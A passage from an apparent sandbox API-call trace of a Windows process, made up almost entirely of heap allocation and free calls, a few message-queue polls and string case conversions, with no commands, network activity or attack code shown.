dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.631] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a7418 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a7418 | out: hHeap=0x650000) returned 1 [0075.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.631] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.632] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.632] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.633] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.634] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.634] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.634] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.634] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690710 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690780 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690790 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abe0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.637] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.637] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.638] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.639] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 